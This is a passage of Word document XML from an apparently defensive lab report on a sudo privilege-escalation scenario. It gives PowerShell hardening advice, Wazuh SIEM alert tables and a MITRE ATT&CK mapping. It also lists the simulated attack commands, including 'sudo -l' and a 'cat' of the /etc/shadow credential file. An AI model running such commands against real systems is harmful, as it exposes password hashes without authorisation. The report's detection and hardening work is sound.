            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52EF9FF5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Restrict PowerShell execution policy: Set-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ExecutionPolicy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RemoteSigned</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4B1DC0EC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02BE6CFC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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E67B1D2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Enable PowerShell Script Block Logging (Event ID 4104)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="34286721" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F7F0356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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56AFDFC5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Deploy AppLocker or WDAC to block unauthorized script execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D09194F" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CA7A5" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="360"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. SCENARIO 3 — PRIVILEGE ESCALATION (SUDO ABUSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33582468" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Attack Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57797DDA" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="334" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Privilege escalation techniques were simulated on the Ubuntu Server by enumerating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permissions and accessing sensitive system files. These actions represent common post-exploitation steps taken by attackers after gaining initial access to a Linux endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADDE664" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="235"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Commands executed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="220" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="47" w:type="dxa"/>
          <w:left w:w="100" w:type="dxa"/>
          <w:bottom w:w="12" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="6C79E617" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="97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8F8F8"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5DDC6E22" w14:textId="77777777" w:rsidR="00BA2BC0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</w:rPr>
              <w:t xml:space="preserve"> -l (enumerate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</w:rPr>
              <w:t xml:space="preserve"> privileges)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="23D3738F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="97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8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1B7CF519" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="15DBDB27" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="97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8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="020506A0" w14:textId="77777777" w:rsidR="00BA2BC0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</w:rPr>
              <w:t xml:space="preserve"> cat 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</w:rPr>
              <w:t>/shadow (access sensitive credentials file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E733566" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Detection — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SIEM</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="page" w:horzAnchor="page" w:tblpX="1260" w:tblpY="13885"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="35197DA5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14D44673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7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E9F6CB1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</w:tbl>
    <w:p w14:paraId="2DF5F763" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detected all privilege escalation activity through the installed agent. A total of 407 events were recorded, with critical alerts for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-to-root execution and first-time </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> usage flagged immediately.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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52"/>
        <w:gridCol w:w="5904"/>
        <w:gridCol w:w="2664"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="7E9F9368" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50205FA4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w="5904" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0501E5C8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664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34D8DCE9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</w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="7EFBB08A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AE708E6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1A4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5402</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5904" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C4D2CCF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 xml:space="preserve">Successful </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to ROOT executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57BCBF17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Level 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="35DA9929" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18B0A083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1A4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5904" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B0A772A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 xml:space="preserve">First time user executed </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B8A5B39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Level 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="565C9B6F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E3292B0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1A4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5501</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5904" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="153226C8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PAM: Login session opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40068D04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Level 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4ED1DAE7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39C3C804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1A4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5904" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26DD215D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PAM: Login session closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C55B372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Level 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="011F6F16" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63C7BC7D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1A4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>40111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5904" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0096E8D2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Multiple authentication failures (residual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="386E78DC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Level 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DCDF250" w14:textId="527A94F4" w:rsidR="000E505A" w:rsidRPr="000E505A" w:rsidRDefault="000E505A" w:rsidP="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="372" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E505A">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E61ED00" wp14:editId="15E58737">
            <wp:extent cx="6248400" cy="3197225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1273624824" name="صورة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FB86E" w14:textId="300DE662" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="372" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A6B3C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidR="000E505A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5394E575" wp14:editId="410C74B1">
            <wp:extent cx="6248400" cy="3170555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="634084069" name="صورة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33795" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 MITRE ATT&amp;CK; Mapping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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28"/>
        <w:gridCol w:w="4032"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="5831CF9D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2C5282"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6158023A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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE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2C5282"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="085A66A1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3960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2C5282"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F1FF61F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Tactic</w:t>
            </w:r>
          </w:p>
